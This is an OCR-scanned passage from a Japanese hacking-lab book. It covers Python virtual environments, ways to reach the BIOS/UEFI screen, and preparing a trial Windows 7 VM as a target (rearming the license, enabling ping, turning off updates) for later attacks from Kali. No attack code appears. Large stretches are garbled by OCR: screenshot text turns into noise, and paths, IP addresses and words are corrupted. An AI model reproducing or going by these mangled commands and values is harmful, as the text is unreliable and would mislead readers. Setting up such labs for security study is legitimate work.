する の で 、 こ れ を 実行 する と 仮想 環境 を 利用 で きま す 。 





仮想 環境 を 起動 する と 、[ (仮想 環境 名 )|」 が 行 の 寺 頭 に 表示 され ます 。 以後 、 必 
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要 な パッ ケー ジ の イン スト ー ル は 、 こ れ が 表示 され た 状態 、 す な わ ち 仮想 環境 内 


3 仮想 環境 か ら 抜け る 方 法 


仮想 環境 か ら 抜 ける 場合 に は 、"deactivate.bat' を 実行 し ます ( 図 3-42) 


C:\Users\1Dus1Pon\Desktop\test env\Scr1pt> deactivate . bat 





図 3-42 仮想 環境 へ の 切り 替え 


と ころ で 、Python を イン スト ー ル し た と き に PATH を 通し て いな いた だ た め 、 
python.exe が 存在 する 場所 か 、 PP ませ ん 。 
と ころ が 、 仮 想 環 境内 で あれ ば 、 次 の よう に python を 起動 で きま す 1 フォ 
ルル ダー 内 に は pythonexe が 存在 する た め 、 別 の フォ ル ダ ー に 移動 し て お いた ) 

しか も 、 Wo 系 の 人 マシ ン な の で 、pytln た 人 力 し た だ け で 、 バ ー ジ ョ ン 2 

が 略 び 出さ きれ て いま す 。 

方 、 仮 想 環 境 か ら 抜 けた 場合 、python が 起動 で き な い こと を 確認 で きま す 。 


(test env) C:\Users\1pus1Fron\Desktop\test env>python -V 
Python 2.7.15 


(test env) C:\Users\ipusiron\Desktop\test env>Scripts\deactiva。」 
te . bat 

C:\Users\1pus1Pon\Desktop\test env>python -V 

'python'′ は 、 内 部 コマ ンド また は 外部 コマ ンド 、 

操作 可能 な プロ グラ ム ま た は バッ チ ファ イル と し て 認識 され て いま せん 。 
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人 @ Pyihon3 系 に venv を 導入 する 

Python3 系 で は 、venvy に よっ て 仮想 環境 を 構築 で きま す ("29)。yvenv は 標準 の 
モジ ュー ル な の で 、pip で の イン スト ー ル は 不要 で す 。 

venvy の 使い 方 は 、vjrtualenv の 場合 と 同様 で す 。 "activate.bat や deactivate. 
bat' を 使っ て 、 仮 想 環 境 に 入っ た り 抜け た り し ます 。 


>py -3 -m venv < 仮想 環境 名 > 


同等 の 出力 内 容 の 別 コ マン ド を 知っ て お くべ きか 


セキ ュ リ ティ の 観点 か らい えば 、 同 様 の 結果 を 出力 する コマ ンド を 知っ て お く 
こと は 無駄 で は あり ませ ん 。 例え ば 、route コ マン ド 、netstat -rn コ マン ド 、jp 
route コマ ンド は いずれ も ルー ティ ング テー プル の 内 容 を 表示 し ます 。 

攻撃 され た 恐 れ が ある 端末 を 調査 する 際 に 、 ル ー テ ィング テー ブル を 証拠 と し 
て 記録 する と いう 状況 を 考え ます 。 こ の と き 、 route コ マン ド の 出力 結果 が 信用 で 
きる 内 容 か わか り ま せん 。 な ぜ な ら 、 route コマ ンド が 不正 な プロ グラ ム に よっ て 
上 書き され て いる 滋 れ が ある た めで す 。 そう いっ た と き に 別 の コマ ンド を 知っ て 
お け ば 、 出 力 結果 を 比較 で きま す 。 出力 結 果 に 食い 違い が あれ ば 、 ど ちら か が 改 
ざん され て いる と すぐ に 判明 し ます 。 た だ し 、 食 い 違 い が な く て も 、 両 方 が 改 ざ 
ん され て いる 可能 性 が 少な か ら ず 残さ れ て いる の で 注意 が 必要 で す 。 


*29 : Pipenv と いう pip と venv (virthnaleny) が 連動 し て 動作 する パッ ケー ジ ツ ー ル も 存在 し ます 。 
https://docs.pipeny.org/ 
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3-20| BIOS (UEFI) 画面 を 表示 する 





BIOS (Basic Input / Output System) は 、 マ ザー ボー ド に 保存 され て いる プロ 

グラ ム で す 。 OS より 先 に 起動 し て 、PC の 起動 プロ セス を 制御 し ます 。 

一 迷 に 自作 PC の 初期 モッ ト ア ッ プ の た め に 、BIOS を 利用 する こと が 多い と い 
えま す 。 ま た だ た 。 ハー ドウ ェ ア の 珍 断 で C30) や プー トシ ー ケ ンス て 31) の 変更 と いっ 
た 場面 で も 活用 し ます 。 ハ ッ キ ング の 使 点 か らい えば 、OS の アク セス 制限 を 回 避 
する た め に 、BIOS 画 面 の 表示 方 法 を 把握 し て お く 必 要 が あり ます 。 


汰 BIOS と UEFI 


UEFI (Unified Extensible Firmware Interface) は 、BIOS の 後継 と し て 考案 さ 
れ た 規格 で す 。BIOS で は 、OS が イン スト ー ル する 領域 は 2T バイ ト ま で と いう 制 
限 が あり まし た 。 こ マ に ゃ ーー スト レー ジ の 大 容量 化 に より 、2T バ イト を 超え 

イザ ー あたり まえ と な り 、BIOS で は 時 代 遅 れ と な り ま し た 。 そ の BIOS の 後継 

て 開発 され た の が UEFI で す 。 

UEFI は 、BIOS と OS を 接続 する イン ター フェ ー ス と いえ ます 。UEFI は 、BIOS 
と 比べ て 様々 な 点 に お いて 進歩 し まし た ("32)。UEFI の 設定 画面 は 目 由 度 が 高 
く 、 マ ウス 操作 も 可能 と な り ま し た 。 

UEFI が 一 般 化 し た 現在 に お いて も 、BIOS と いう 表現 が 使わ れ て いま す 。 本書 
で も 単純 に |IBIOS」 ある い は |BIOS (UEEFT)」 と 表現 する こと に し ます 。 


効 UEFI と 旧 BIOS の 見 分 け 方 
Windows10 の 場合 、 シ ステ ム 情 報 か ら Windows の イン スト ー ル の 種類 が 判別 で 
さま す 。 


*30 : BIOS に 備わっ て いる ハー ドウ ェ ア の 診断 機能 で も HDD の 状 胡 を 確認 で きま す 。 より 詳細 な 
診断 を 行い た い 場 合 に は 、 ハ ー ド ウェ ア の 診断 に 特 化 し た Live CD タイ プ の 0S を 活用 し ます 
Grml (https//grmlorg/) や Ultimate Boot CD (http//wwwr.ultimatebootcdcom/) な ど が 有名 


で す 。 
31 : PC の 電源 投入 後に お ける デバ イス を 読み 込む 順番 の こと で す 
*32:OS を 起動 する だ け で な く 、 ド ライ バー を 組み 込ん だ りす る た め 、| ミニ 0S の よう な も の 」 と 


表現 され る こと も あり ます 
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3 | システム 情 報 」 画面 を 表示 する 
「 フ ァイル 名 を 指定 し て 実行 」 画面 で 「msinfo32] を 入力 し て 、| シ ステ ム 情 報 」 
画面 を 表示 し ます 。 


② イ ンス トー ル の 種類 を 確認 する 

| シス テム 情報 」 画面 の | シス テム の 要約 」 を 選ぶ と 、 右 側 に シス テム の 情報 が 
列挙 され ます 。 

ここ で 、BIOS モ ー ド と セキ ュ ア プー ト の 表示 は 次 の 通り で す ( 表 3-11) ( 図 
343) ( 図 344)。 


表 3-11 各々 の パー ティ ショ ン 形 式 の 起動 方 法 


* 
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ファ TIM 基 筆 ( 吉 了 (VO へ ル 九 Hl 


④. 入 - ド 2r ア リゾ ー ス 
お コソ ポー ネン ト 


10.0.17131 ビル ド 17134 
か ソフ トウ ェ ア 縛 名 


利府 下 可 

Microsoft Corporsbon 
ESXTOP-ECGUILOS 
LENOJD 

4290KfF4 

xb キ ペース ユ PC て 


InteiKI CoreiTNI) 7- っ pd40M CPU き zonoGHz、 2p01 Mhz、 > 拓 の コア 、 4 全 の ロジ カル プロ ・ 
SIOS バー- ジ ョ ン / 巨 付 LENOuO 9OKT5zWW [1.22) 2911/OV15 
SMBIOS バー ジョ ン 
e ゃ | ー 


7 ォ ー た で そ よ 
バイ ソト 不 本 
Windoms ディ ルク トリ CwwWiNDOwS 
シス テム & テイ ルウ トリ C*WWINDOMSYsystem 
< 





直り の 名 生け 検索 す 5) 


図 3.43 旧 BIOS の 場合 


33 :「 シ ステ ム 情 報 」 画面 で は 「 レ ガ シ 」 と 表記 され ます 。 
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物 シス テム 
フイ ル (F 司 春 IE 村 世 [VI へ ルプ 店 
シス テム の 埋め は ] 
『ー ド ウェア リリー ス 8 ono 
「 し ー ジ ョ : 10Qi7434CI ド 713 
放 不 可 


Mcrosolt Cceporabce 

LESKTOP -tNSI5TE 

NEC 

FC-NSi50DAR 

xy5 も ホース PC 

史 -GRITCN 丈 DCTTDHGDA 

Inie 和 Cdewon(RI CPU 3219U り 9 70GHz、 1701 Mhz、 2 個 の コア 、 2 例 9D ジ カル ゴロ 








3-44 UEFI の 場合 


釣 従来 の BIOS 画 面 の 出し 方 

BIOS (UEFTI) の メニ ュー 画面 を 表示 する た め に は 、PC 起 動 時 の メー カー ロゴ 
が 表示 され て いる 数 秒 の 間 に 特 定 の キー を 押し ます 。 た だ し 、 PC 本体 ある い は マ 
ザー ボー ド の メー カー に よっ て 押す キー が 異な り ま す 。 一 般 に は 、 [Del」 キー 目 
作 PC に 多い ) ある い は [Fn2] キー (メー カー 製 の PC の ほとん ど ) を 押し ます 。 

例外 と し て 、Lenovo で は [Fn1] キー、 hp で は [Fn10] キー、 DELL で は [Fn12] 
キー を 押し ます 。ASUS の 場合 、 PC と し て 出荷 きれ て いる 場合 は [Fn2] キー、 マ 
ザー ボー ド の 場合 は [Dell キー を 押し ます 。 迷 っ た ら 、 [Dell キー と [Fn2] キー 
の 両方 を 押し っ ぱな し に し て お け ば よい で し ょ う 。 

し か し な が ら 、 Windows 上 の 「 高 速 ス ター ト ア ッ プ 」 が 有効 に な っ て いる 場合 、 
電源 OFF 状態 か ら の コー ルド ブー ト で は 、 こ れ ら の キー 押下 で BIOS に 入れ ませ 
ん 。 ま た 、Windows が 「UEFI 形 式 で イン スト ー ル |」 され 、 か つ 「 マ ザー ボー ド 
の Fast Boot が 有効 に な っ て いる 状態 」 で も 、 こ れ ら の キー 押下 で BIOS に 入れ ま 
せん 。 
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メイ ン PC の スタ ー ト アッ プ キ ー 


自分 の メイ ン PC の スタ ー ト アッ プ キ ー を 調べ て 、 表 3.12 に 記入 し て お きま し ょ 
う 。 も し 、 機 能 が 利用 で き な い 場合 は 、x を 記入 し て お きま す 。 


表 3-12 自分 の PC の スタ ー ト アッ プ キ ー 
スタ ー ト アッ プ キ ー 


Windows Recovery Environment の 起動 | 
起動 デバ イス の 選択 し 0 ハハ ハハ ハハ ハハ ttRt つ ププ 





湊 BIOS (UEFI) 画面 の 出し 方 

最近 の PC で は 、 マ ザー ボー ド や OS の 事情 に より 、 従 来 の よう に PC 起動 直後 の 
[Dell キー や [Fn2] キー の 入力 で BIOS (UEFT) 画面 に 入れ な く な り ま し た 。 特 
に 大 き な 原 因 は 2 つ あ り ま す 。 

1 つ 目 は 、 マ ザー ボー ド の Fast Boot 機 能 に よる も の で す 。2 つ 目 は 、Windows 
(8 以降 ) の 高速 スタ ー ト アッ プ 機 能 に よる も の で す 。 い ずれ も PC の 起動 時 間 の 短 
縮 を 目的 と し て お り 、 結 果 と し て PC 起動 時 の キー 入力 を 受け 付け ませ ん 。 そ の た 
め 、[Del] キー や [Fn2] キー で BIOS (UEFTI) 画面 を 表示 で きず 、[Fn8] キー 
で セー フ モ ー ド の 起動 も で きま せん 。 

その た め 、BIOS (UEFTI) 画面 を 表示 する に は 、 一 般 に は 次 の 手順 を 実行 し ま 
す 。 


①Windows の 設定 画面 で 「 更 新 と セキ ュ リ ティ 」 を 選ぶ 。 

② 左 メニ ュー か ら 「 回復 」 を 選び 、[PC の 起動 を カス タマ イズ する 」 の | 今 す ぐ 
PC を 再起 動 す る 」 を 選ぶ 。 

③ 再 起動 する と 、[「 オ プシ ョ ン の 選択 」 画面 が 表示 され る 。 

④「 ト ラブ ル シ ュ ー テ ィング | >「 詳 細 オ プシ ョ ン 」 を 選び 、「UEFI フ ァ ー ム ウェ 
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の 設定 ] を 選ぶ (34)。 


する と 、PC が 再起 動 し て 、BIOS (UEFTI) 画面 が 表示 され ます 。 

他 の 方 法 と し て は 、 マ ザー ボー ド の Fast Boot 機 能 を 無効 に し 、 Windows の 高速 
スタ ー ト アッ プ 機 能 を 無効 に する と いう 方 法 も あり ます 。 前 者 は マザー ボー ド の 
設定 画面 、 後 者 は Windows の 電源 オプ ショ ン か ら 設 定 で きま す 。 こ れ に より 、PC 
起動 時 に キー 入力 を 受け 付け る よう に な る の で 、 従 来 の よう に BIOS (UEFTI) 画 
面 を 表示 で きま す 。 


34 : BIOS モ ー ド が レガ シー の 場合 や 、 シ ステ ム デ ィ ス ク が MBR の 場合 、Windows は レガ シー 
BIOS モ ー ド で 起動 し て いま す 。 こ の 手順 で は 選択 肢 に 「UEFI ファ ー ム ウェ ア の 設定 ] が 出 な い 
場合 が あり ます 。 ま た 、 一 部 の メー カー 製 PC や 、VMware な ど 特 殊 な 環境 に Windows 10 を イン 
スト ー ル し た 場合 に も 出 な いこ と が あり ます 。 
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第 2 部 
ハッ キン グ を 体験 する 


明記 


Windows の 
ハッ キン グ 








| は じ め に / 
これ まで の 解説 を 通じ て 、 ハ ッ キ ング ・ ラ ボ の 中 核 を な す ホ スト 0S 
Wiaeloy に 洋 19) 計 = レ 必 各 6 に 質 (. 人 1 け 且 2 そ ヨ Kek- さ 7/= 
ここ か ら は 、 タ ター ゲット 端末 を 準備 し て 、 実 際 に ハッ キン グ を 体験 し ます 。 
最初 の ター ゲッ ト は 、 最 も 広く 使わ れ て いる OS で ある Windows で す 。 本 草 
で は 、 ハ ッ キ ング ・ ラ ボ に Windows の 仮想 マシ ン を 構築 し 、Kali に よっ て 
Windows を 攻撃 する 方 法 に つい で 解説 し ます 。 


4-1 、 Windows 7 の ハッ キン グ 





Windows 7 は 2020 年 1 月 14 日 に サポ ボート を 終了 する と 発表 きれ て いま す ①1)。 
それ で も Windows 7 を 使い 続け て いる ユー ザー は 周囲 に 見 受け られ ます 。Net 
Applications の デー タ (https://netmarketshare.com/) に よる と 、2018 年 6 月 で 
Windows の 中 で 7 の シェ ア (41%) が トッ プ で あり 、 次 いで 10 の シェ ア (359%) が 
続い て いま す 。 過去 の 事例 を 考え る と 、 サ ポー ト が 切れ て も 使用 し 続け る ユー 
ザー は 一 定数 存在 する と 推測 で きま す 。 

よっ て 、Windows 7 の ハッ キン グ を 将 得 する こと は 無駄 で は あり ませ ん 。 ここ 
で は 、Windows 7 の 仮想 マシ ン を 構築 し 、Windows 7 を 通じ て Windows シス テム 
に 対す る ハッ キン グ に つい て の 理解 を 深め ます 。 


洲 Windows 7 の 入手 方 法 
Microsoft か ら 、 試 用 版 の Windows の 仮想 マシ ン が 提供 され て いま す 。 ラ イセ 
ス が 不要 で あり 、 無償 で 60 日間 利 用 で き 、 Windows 7 や 81 を ダウ ン ロ ー ド 
す 。Web 開 発 に お ける IE (Internet Explorer) の 検証 用 で す が 、 実 験 用 に も 十 2 
に 活用 で きま す 。 付属 し て いる IE も 8 一 10 と 細か く 選 べ ま す 。 
継続 的 に 使用 する の で あれ ば 、 正 規 の ライ セン ス を 入手 し て くだ さい 。 仮 想 マ 
シン で あっ て も 、 ラ イセ ンス が 必要 に な り ま す 。 


汐 試用 版 VWindows 7 の 仮想 マシ ン を 作成 する 


1 試用 版 の 仮想 マン ン を タウ ン ロ ー ド する 
次 の ペー ジ か ら 試 用 版 の 仮想 マシ ン の ファ イル を ダウ ン ロ ー ド で きま す ( 図 
4-] ) 。 





Free Virtual Machines from IES to MS Edge - Microsoft Edge Deyelopment 


https://developermicrosoft.com/en-us/microsoft-edge/tools/Yms/ 


・ 新 機能 の 追加 は 行わ れ て お ら ず 、 無 償 サ ポー ト も 終了 し て いま す 。 執筆 時 点 で は 、 セ キュ リ 
CSJ ト の み 行 われ て いま す 
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店 Microsoft 


Home , Too  \ Wh 


Download virtual machines 


Test Microsoft Edqge and versions Of IE8 through IE11 using 
free virtual machines you download and manage locally. 


Select a ownload 


り iual machine 





IE8 on Win7 (x86) 


Select platform 


| VirtualEox 


9 1 8 11 ほぼ ヤ 』 | し と 





図 41 ダウ ン ロ ー ド ペー ジ 


この ペー ジ で 、Virtual machine で |E 8 on Win7 (x86)」、Select platform で 
[VirtualBox」(*2) を 指定 し ます 。[DOWNLOAD .ZIP >] ボタ ン を 押す と 、zjp 
ファ イル の ダウ ン ロ ー ド が 始ま り ま す 。 


(②)ova フ ァイル を イン ボー ト す る 

ziDp フ ァイル を 展開 する と 、ova フ ァイル (ここ で は "IE8 - Win7.ova" ファ イル ) 
が 入っ て いま す 。 VirtualBox を 起動 し て 、ova フ ァイル を イン ポー ト し ます 。 仮想 
マシ ン と その 構成 は 図 4.2 の 通り で す 。 


2 : 他 の 仮想 化 ソ フト 向け に 、Vagrant や VMware な ども 選べ ます 。 
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を 仮 雪 アプ テイ アン 2 の イン ゴート 


坂 想 ア ブラ イア ンス の 喜 定 
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光 ネッ トワ ー ウ アダプタ - | に tm PROYsOO) MT Dmasp (EPS4OE 
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や *^ ト ルー ジコ ゴット ロー ラー ID Xe 


| ] 9 す * て 0⑪+ ッ トー リリ ー ド CNT ド し ハス 8 調 NR 
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図 4-2 仮想 アプ ライ アン ス の 設定 


モリ ー は デフ ォ ル ト で 1024M バイ ト で す が 、 人 余裕 が あれ ば 2048M バイ ト に 
増やし て も よい で し ょ 2 う 


3 仮想 マン シン を 起動 する 


[IE8 - Win7」 の 仮想 マシ ン を 起動 し ます 。 ロ グイ ン 認 証 な みなし で 、 デ スク トッ プ 
画面 が 表示 され ます ( 図 4-3) 


SaPehoU り nc 


Censlmno mnOtes amd euakotion Period : 
c ー- N 坪 「 生 まま 」 | _- 


6 @ mm emm 
KW (。 Kmmamwtd fmt NN | 。 Pf am Amde hiats ー 








図 4.3 試用 版 Windows 7 の デス クト ッ プ 画面 
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デス クト ッ プ の 背景 に は Windows や IE の バー ジョ ン 、 ユ ー ザ ー 名 や パス ワー 
ド が 表示 され て いま す 。 ユー ザー 名 は "TEUser' 、 パ スワ ー ド は "PasswOrd!' に な 
り ま す 。 

システム 情報 を 確認 する と 、32bit 版 の Windows 7 で ある こと が わか り ま す 。 


④)Windows 7 を 再起 動 す る 


Windows 7 を 再起 動 す る と 、 マ ウス 統合 が 有効 に な り 、 ホ スト OS と ゲス ト OS 
の 聞 で スム ー ズ に マウ ス 操 作 で きま す 。 


Windows 7 の ライ セン ス 認 証 の 猫 予 期間 を 延長 する 


Windows 7 は プロ ダク トキ ー を 入力 し な いで イン スト ー ル し た と き 、10 日 間 試 
用 で きま す 。 管理 者 権限 で コマ ンド プロ ンプ ト を 起動 し 、slmgr コマ ンド (実体 は 
'slmgr.vbs" フ ァイル ) を 実行 する と 、 こ の 獲 予 期間 を 確認 し た り 、 延 長 し た り で 
きま す 。 

挫 の よう に 入力 する と 、 ラ イセ ンス 認証 の 猫 予 期間 や リセ ッ ト 可 能 回 数 が 表示 
され ます ( 図 44) 。 
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図 444 ライ セン ス 認 証 に 関す る 情報 
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[Time remaining」 ( 獲 予 期間 ) は 10 日 間 、「Remaing Windows rearm count」 
(リセ ッ ト 可 能 回 数 ) は 5 と 確認 で きま す (3) 。 猫 予期 間 を 過ぎ る と 警告 が 出 て 、 
1 時 間 経過 する と 強制 的 に シャ ッ ト ダ ウン され て し まい ます 。 

次 の よう に 入力 する と 、 猫 予期 間 が リセ ッ ト さ れ 、 再 起動 を うな が され ます 。 


>slmgr /rearm 


この 試用 版 の 場合 は 、5 回 まで ライ セン ス 認 証 の 獲 予 期間 を 延長 で きる の で 、 最 
初 の 10 日 に 加え て 、 最 大 で 60 日 (=10+10x5) 試用 で きま す 。 


汐 Windows 7 の 初期 設定 

Windows 7 の 仮想 マシ ン は ター ゲッ ト 端 末 と し て 扱い ます 。 そ の た め に 、 ホ ス 
ト オ ン リー ネッ トワ ー ク に 属す る よう に 設定 し な けれ ば な り ま せん 。 そ し て 、 実 
験 と し て は 不要 な 機能 を 一 部 無効 に し ます 。 


① 仮 想 LAN アダ プター の 設定 を する 
Windows 7 の 仮想 マシ ン の 仮想 LAN ア ダ プ ター を 次 の よう に 設定 し ます ( 図 
4.5) 。 





割り 当て : ホス ト オ ン リー アダ プター 
名 前 : VirtualBox Host-Only Ethernet Adapter 


*3 : 猫 予 期間 や リセ ッ ト 可 能 回 数 は 、Windows の パー ジョ ン や エディ ショ ン に よっ て 違い ます 。 
猫 予期 間 が 30 日 間 、 リ セッ ト 可 能 回 数 が 3 回 と いう パタ ー ン も あり ます 。 
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図 4.5 仮想 LAN ア ダ プ ター の 設定 


②Windows 7 の 仮想 マシ ン の IP アド レス を 確認 する 

Windows 7 は 動 的 IP アド レス で 運用 し ます 。Windows は デフ ォ ル ト で 動 的 TP 
アド レス を 取得 する よう に な っ て いま す 。 そ の た め 、Windows 7 で LAN ア ダ プ 
ター を 設定 する 必要 は あり ませ ん 。 

Windows 7 の 仮想 マシ ン を 起動 し ます 。 コ マン ド プ ロン プ ト を 起動 し て 、 
ipconfig コ マン ド で IP アド レス を 確認 し ます 。10.0.0.101 一 100.0.254 で な けれ ば ば 、 
ipconfig /renew コマ ンド で IP アド レス を 取得 し 直し ます ( 図 4-6)。 





| 第 4 章 | Windows の ハッ キン グ 2 っ 21 


SN IF すう も 0911 コ うみ サ ォ ョ リコ リコ を まき: 


Mindous IP ConEF iguma も を ュ ロ ロ 


う = 


Ethernet adaptexw Loca] Hrwea Connect ュ or 
じ nnnEr キ nn 一 SDEC1T1C UNS SutF1ix 。 s を leE も を SsーBaSt 1 
Link-ーloca1 』Pu6 HHddxiese 。 。 。 . .。 : ま o89: :255b: 413 :414 け : 453# シ 15 
HuEt0C0IE 1qHUKAELiOn 1FuU3 HOHEPKESS. .。 - エロ 25 は は.b7 .5J 
Nd | hn et as に に ク 25 らら . の 55 こ | Ui 
Dcfault Ga を cwua . . に = = < 

Tunnel adap も か 1Sa ュ も ap . ま 上 G も モー8aS も キ 。 jp: 


ea $ を aEB 。 。 。 。 Ba MiSConnEC を ed 
Connec も onーSpDBcC1f ュ ic DNSE SuEFx  。 = 放 1eG も =ーBas も t 。 jp 


じ <NUlsemSNIE 有 さら か >1 ロ CO ロキ ま ュ ロロ プロ nEU 


UindouSsS IF COnE 1u ド At10T 


ELherhnet adan も Eh LocCal HFEa COnnecCtnion 2 に 


ComiiEC も LO0n ロ SDECIF1C DNS SuEFix 


3Dk-ーInCal IPub HrddtesS 。 。 ささ ロ ロット す を も 1 は EL KK を LE リト EK で 1 オル セ に 


[Pv4 ddxess。。 。 。 - 。 。 。 = 9..193 
SuJDnet MaSK 。 。 。 。 。 っ SS SS 。ZSS 。 自 
Defau 1 も い は a に りり a リ の: の か 3 


Lunhe | 8a0AD も GEG む 1SALAD. く 53152HZ ド ビー は 9 ドア ー458 上 トーUD5 は -ーZ 4 けけ 1 79925bHy> <: 


Meduia State 。 。 。 。 。 。 。 。 。 。 。 = Media disconnec も ed 
じ nnnheC キ nn ローSiDEC1f1r DNS SuEFix 





じ に NUSseFSNIEUS ほ BK>_ 


図 4.6 IP アド レス を 取得 し 直し た 


3 Ping の 応答 を 返す よう に 設定 する 
Windows 7 は セキュリ ティ の 観点 か ら Ping の 応答 を 返さ な いよ うに な っ て いま 
す (4)。 これ は 自身 の 存在 を 隠 藤 する こと が 目的 で あり 、 攻 撃 を 防ぐ も の で は あ 


り ま せん 。 こ こ で は 、 ネ ットワーク の 疎通 確認 の た め に 、Ping の 応答 を 返す よう 





スタ ー ト メニ ュー か ら | Control Panel」 > |System and Security」 > | Windows 
s たたき アプ 


Firewall」 を 選び ます 。 左 ペイ ン の |Advanced settings」 を 押す と 


ウォ ー ル の 設定 画面 が 表示 され ます 。 左 ペイ ン の |Inbound Rules」 (受信 の 規則 ) 
File and Printer Sharing (Echo Request - ICMPyv4-In) 」( フ ァイル と プリ ン 


ター の 共有 (Echo 要求 





ICMPv4 受 信 )) を 右 ク リッ ク し て 、Properties を 選び 


す 。 |Generall タブ の |Enabled]」 に チェ ッ ク を 入れ て 、 人 [Apply]」 ボタ ン を 押し 


す 【 図 4-7) 


"4 : 茂 常 に は Ping の ICMP 妥 求 を ファイ アウ ォ ー ル で フイ ィ イル ング し て いま す 。 そ そもそも 
CMP 受 民 ] に 31 電 7 な し の ) で て お ICMP 応 答 nn 』 キ 1 
*5 : この 設定 を 飛ば し て も 、 以 降 で 解説 する 攻撃 は 成功 し まう 
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図 4-7 Ping の 応答 を 返す 設定 


④. ホ スト OS が Ping の 応答 を 返す よう に 設定 する 

Windows 10 も Windows 7 と 同様 に Ping の 応答 を 返し ませ ん 。 ホ スト OS に 
Windows 10 を 採用 し て いる の で あれ ば 、 同 様 の 設定 を 適用 し て Ping の 応答 を 返 
す よ うに し ます 。 具体 的 な 設定 方 法 は ステ ッ プ ③ と 同様 で す 。 また 、42 の 
「 Windows 10 の 初期 設定 ] の ステ ッ プ ③④ も 参考 に し て くだ さい 。 


5 Windows 7 の 仮想 マシ ン に 接続 で きる こと を 確認 する 
Kali の 仮想 マシ ン を 起動 し ます 。Ping で Windows 7 の 仮想 マシ ン に 接続 で きる 
こと を 確認 し ます 。 





Foot 條 ka11:<# pD1hng 19.9.9.1 ホス ト os に Ping す る 。 
root@ka1i:<# ping <Mindows 7 の TP アド レス > 
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⑥ Windows 7 の 仮想 マシ ン に て Ping で 疎通 を 確認 する 


>ping 19.9.9.1 ホス ト os に ping す る 。 
>p1ng 19.9.9.2 Kali に Ping す る 。 





以上 で ホス ト オ ン リー ネッ トワ ー ク 内 に 攻撃 端末 と ター ゲッ ト 端 末 を 存在 さ 
せ 、 通 信 し 合え る よう に で きま し た 。 


7 Windows Update を 停止 する 

Windows Update 機 能 を 有効 に し て お く と 、 た び た び アッ プ デ ー ト が 実行 され 
て し まい ます 。 実験 環境 で は 必要 な い の で 、 停 止 し ます 。 「Control Panel」 > 
「System and Security」 > 「Windows Update」 を 選び ます 。 左 ペイ ン か ら 
|Change settings| を 選び 、|[Important updatesl の プル ダウ ン メ ニュ ー に て 
| Never check for updates (not recommended)」 を 選び 、[OK] ボタ ン を 押し ます 
( 図 4-8)。 


< と に IE 2 
そ - (人) 舎 > Conbol Pane ト System and SEcurity ! WindowsUpdate ! Change settings マ | 人 な 上 egr み ConeePon 。 の | 


Choose how Windows can install updates 

When yoOwur computer is online. WWindows can automatica 暫 Check for important updates and nsa inhem 
usimd 1hexe settind*. WWhen new updiates are available you can ako instalthem befoee shutmnq down the 
<Oomputer- 

How does automatic updating help me* 





]mportarM upd3tes 


nl new UpG2TeS lvcr dy ェ | < |390 AM ・ 
Kecomrmeided update 
尻 ] Givc me rccommendcd updatcsthe sm waY Ire て cve importsnt pdates 


Wihno can in updates 
尻 Allow all users to inttal updates on this <oemPtuler 
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図 4.8 Windows Update 機能 を 無効 に する 
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8)VirtualBox Guest Additions を 適用 する 

VirtualBox Guest Additions を 適用 し て 、 仮想 マシ ン の 操作 性 を 向上 させ まし ょ 
う 。 

仮想 マシ ン の メニ ュー の 「 デ バイ ス 」 > [Guest Additions CD イメ ー ジ の 挿入 」 
を 選び ます 。 数 秒 待つ と AutoPlay 画面 が 表示 され る の で 、Run VBoxWindows 
Additions.exe を 選び ます (6)。UAC を 許可 する と イン スト ー ル ウイ ザー ド が 表 
示さ れ ま す 。 デ フォ ルト 設定 の まま イン スト ー ル を 進め ます 。 途中 で いく つか の 
デバ イス ソフ トウ ェ ア の イン スト ー ル を 確認 され る の で 、 イ ンス トー ル し ます 。 
イン スト ー ル を 終え た ら 、Windows 7 が 再起 動 し ます 。 


9 日 本 語 キ ー ボ ー ド の ドラ イ バ ー を 適用 する 

英語 キー ボー ド が 適用 きれ て いる の で 、 日 本 語 キ ー ボ ー ド を 使用 し て いる と 記 
号 な ど を 入力 し づら く 不 便 で す 。 そ こ で 、 日 本 語 キ ー ボ ー ド の ドラ イ バ ー を 適用 
し ます 。 

スタ ー ト メニ ュー の コマ ンド 入力 欄 に |「devmgmtmsc」 を 入力 し て 、 デ バイ ス 
マネ ー ジ ャ ー を 起動 し ます 。 [IE8WIN7」 > 「Keyboards」 > [Standard PS/2 
Keyboard|] を ダブ ルク リッ ク す る と 、 プ ロ パ ティ 画面 が 表示 され ます 。「Driver」 
タプ に て 、[Update Driver] ボタ ン を 押し ます 。 ウィザー ド が 起動 する の で 、 
| Browse my computer for driver software」> |Let me pick from a list of device 
drivers on my computer」 を 選び ます 。|Show compatible hardware」 (互換 性 の 
ある ハー ドウ ェ ア を 表示 する ) と いう チェ ッ ク を 外し 、Manufacture で 
[「 (Standard keyboards) 」、 Model で 「]Tapanese PS/2 Keyboard (106/109 Key Ctrl 
+ Eisuu)」 を 選択 し て 、[Next] ボタ ン を 押し ます ( 図 4.9)。「Update Driver 
Warning] ダイ アロ グ が 表示 され ます が 、[Yes] ボタ ン で 先 に 進み ます 。 プロパ 
ティ 画面 を 閉じ る と 再起 動 を うな が され る の で 、Windows 7 を 再起 動 し ます 。 


*6 : AutoPlay 画 面 を 閉じ た 場合 、Computer フ ォ ル ダー の CD デバ イス を ダ プ ルク リッ ク し て くだ 
さい 。 
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図 4-9 日 本 語 キ ー ボ ー ド の ドラ イ バ ー を 設定 する 


この まま だ と 、 再 起動 し て も キー ボー ド 配 列 は 英語 の まま で す 。 そ こ で 、 シ ス 
テム の 言語 設定 を Japaneses に し ます 。 ス ター トメ ニュ ー ン |Control Panell」 > 
|Change display language」 を 選び ます 。|Region and Language」 画面 に て 、 
| Administrative] タブ を 選び 、[Change system locate] ボタ ン を 押し ます 。 
「Current system locate」 と いう プル ダウ ン メ ニュ ー で 、[「Tapanese (japan)」 を 
選び 、[OK] ボタ ン を 押し ます 。 

再起 動 す る と 、 タ スク トレ イ に 「EN」] と いう 言語 選択 の アイ コン が 現れ ます 。 
[TP」 に 切り 夫 え る と 日 本 語 キ ー ボ ー ド の レイ アウ ト が 適用 され ます ( 図 4-10)。 正 
常に 入力 で きる こと を メモ 帳 な ど で 確 か め て くだ さい 。 


ツ JP Japanese (Japan) 
EN English (United States) 


Show the Language bar 


JP '・: A 。 陸 6。 の 


/48 AM 
リア リア リド 





図 4.10 言語 選択 アイ コン が 表示 され た 


し か し 、 ア プリ を 起動 する た びに |EN」 に 戻っ て し まい ます 。 毎回 切り 替え る 
の は 手間 が か か る の で 、 デ フォ ルト で |]JP]」 に な る よう に し ます 。 | Region and 
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Language」 画面 に て 、|[Keyboards and Languages| タブ を 選び 、[Change 
